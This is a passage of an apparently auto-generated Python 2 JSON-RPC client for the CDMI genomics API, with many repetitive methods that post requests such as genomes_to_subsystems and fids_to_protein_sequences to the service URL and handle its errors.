raise ServerError('Unknown', 0, 'An unknown server error occurred')
def genomes_to_subsystems(self, genomes):
arg_hash = {'method': 'CDMI_API.genomes_to_subsystems',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def subsystems_to_genomes(self, subsystems):
arg_hash = {'method': 'CDMI_API.subsystems_to_genomes',
'params': [subsystems],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def subsystems_to_fids(self, subsystems, genomes):
arg_hash = {'method': 'CDMI_API.subsystems_to_fids',
'params': [subsystems, genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def subsystems_to_roles(self, subsystems, aux):
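        # 'aux' appears to be a flag controlling whether auxiliary roles
        # are included in the result; the generated client does not
        # document its parameters, so treat this as an assumption.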
arg_hash = {'method': 'CDMI_API.subsystems_to_roles',
'params': [subsystems, aux],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def subsystems_to_spreadsheets(self, subsystems, genomes):
arg_hash = {'method': 'CDMI_API.subsystems_to_spreadsheets',
'params': [subsystems, genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_roles_used_in_models(self):
arg_hash = {'method': 'CDMI_API.all_roles_used_in_models',
'params': [],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def complexes_to_complex_data(self, complexes):
arg_hash = {'method': 'CDMI_API.complexes_to_complex_data',
'params': [complexes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def genomes_to_genome_data(self, genomes):
arg_hash = {'method': 'CDMI_API.genomes_to_genome_data',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_regulon_data(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_regulon_data',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def regulons_to_fids(self, regulons):
arg_hash = {'method': 'CDMI_API.regulons_to_fids',
'params': [regulons],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_feature_data(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_feature_data',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def equiv_sequence_assertions(self, proteins):
arg_hash = {'method': 'CDMI_API.equiv_sequence_assertions',
'params': [proteins],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_atomic_regulons(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_atomic_regulons',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def atomic_regulons_to_fids(self, atomic_regulons):
arg_hash = {'method': 'CDMI_API.atomic_regulons_to_fids',
'params': [atomic_regulons],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_protein_sequences(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_protein_sequences',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_proteins(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_proteins',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_dna_sequences(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_dna_sequences',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def roles_to_fids(self, roles, genomes):
arg_hash = {'method': 'CDMI_API.roles_to_fids',
'params': [roles, genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def reactions_to_complexes(self, reactions):
arg_hash = {'method': 'CDMI_API.reactions_to_complexes',
'params': [reactions],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def aliases_to_fids(self, aliases):
arg_hash = {'method': 'CDMI_API.aliases_to_fids',
'params': [aliases],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def aliases_to_fids_by_source(self, aliases, source):
arg_hash = {'method': 'CDMI_API.aliases_to_fids_by_source',
'params': [aliases, source],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def source_ids_to_fids(self, aliases):
arg_hash = {'method': 'CDMI_API.source_ids_to_fids',
'params': [aliases],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def external_ids_to_fids(self, external_ids, prefix_match):
arg_hash = {'method': 'CDMI_API.external_ids_to_fids',
'params': [external_ids, prefix_match],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def reaction_strings(self, reactions, name_parameter):
arg_hash = {'method': 'CDMI_API.reaction_strings',
'params': [reactions, name_parameter],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def roles_to_complexes(self, roles):
arg_hash = {'method': 'CDMI_API.roles_to_complexes',
'params': [roles],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def complexes_to_roles(self, complexes):
arg_hash = {'method': 'CDMI_API.complexes_to_roles',
'params': [complexes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_subsystem_data(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_subsystem_data',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def representative(self, genomes):
arg_hash = {'method': 'CDMI_API.representative',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def otu_members(self, genomes):
arg_hash = {'method': 'CDMI_API.otu_members',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def otus_to_representatives(self, otus):
arg_hash = {'method': 'CDMI_API.otus_to_representatives',
'params': [otus],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_genomes(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_genomes',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def text_search(self, input, start, count, entities):
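        # note: the parameter name 'input' shadows the Python builtin of
        # the same name; it is left unchanged to match the generated
        # service signature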
arg_hash = {'method': 'CDMI_API.text_search',
'params': [input, start, count, entities],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def corresponds(self, fids, genome):
arg_hash = {'method': 'CDMI_API.corresponds',
'params': [fids, genome],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def corresponds_from_sequences(self, g1_sequences, g1_locations, g2_sequences, g2_locations):
arg_hash = {'method': 'CDMI_API.corresponds_from_sequences',
'params': [g1_sequences, g1_locations, g2_sequences, g2_locations],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def close_genomes(self, seq_set, n):
arg_hash = {'method': 'CDMI_API.close_genomes',
'params': [seq_set, n],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def representative_sequences(self, seq_set, rep_seq_parms):
arg_hash = {'method': 'CDMI_API.representative_sequences',
'params': [seq_set, rep_seq_parms],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
